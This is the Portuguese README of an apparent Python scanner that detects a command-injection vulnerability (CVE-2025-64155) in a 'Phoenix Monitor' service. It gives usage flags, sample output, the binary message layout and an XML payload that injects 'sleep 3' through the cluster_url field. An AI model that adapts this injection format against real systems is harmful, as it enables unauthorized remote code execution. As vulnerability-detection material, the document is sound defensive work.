
CVE-2025-64155-hunter
Um scanner em Python para detectar a vulnerabilidade de injeção de comandos (CVE-2025-64155) no serviço Phoenix Monitor.
CVE-2025-64155 é uma vulnerabilidade de injeção de comandos no serviço Phoenix Monitor que permite execução remota de código através do parâmetro cluster_url no comando handleStorageRequest (ID do comando: 1075724911).
A vulnerabilidade ocorre quando a entrada controlada pelo usuário no campo cluster_url é passada para um comando shell sem a devida sanitização, permitindo injeção de comandos por meio de metacaracteres de shell.
Este scanner é baseado na pesquisa de exploit feita por Horizon3AI.
python3 scanner.py -t <target_ip>
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900
# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v
# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15
# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only
-t, --target: Endereço IP ou nome de host do alvo (obrigatório)-p, --port: Porta do serviço Phoenix Monitor (padrão: 7900)--timeout: Tempo limite de conexão em segundos (padrão: 10)-v, --verbose: Habilita saída detalhada (verbosa)--check-only: Apenas verifica se o serviço está acessívelO scanner utiliza um método de detecção baseada em tempo:
handleStorageRequest com um payload malicioso contendo sleep 3 no campo cluster_urlEste método é seguro e não destrutivo - ele não executa comandos prejudiciais, apenas um comando sleep inofensivo para fins de detecção.
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds
============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds
============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable
O scanner envia uma mensagem binária com a seguinte estrutura:
[4 bytes] Message length (156)
[4 bytes] Payload length
[4 bytes] Command ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 bytes] Padding/Flags (0)
[Variable] XML payload
O payload XML contém uma injeção de comando no campo cluster_url:
<TEST_STORAGE type="elastic">
<cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
...
</TEST_STORAGE>
Esta ferramenta é apenas para fins autorizados de teste de segurança e pesquisa. Use esta ferramenta somente em sistemas que você possui ou para os quais tenha permissão explícita para testar. O acesso não autorizado a sistemas de computador é ilegal.
Licença MIT - consulte o arquivo LICENSE para obter detalhes.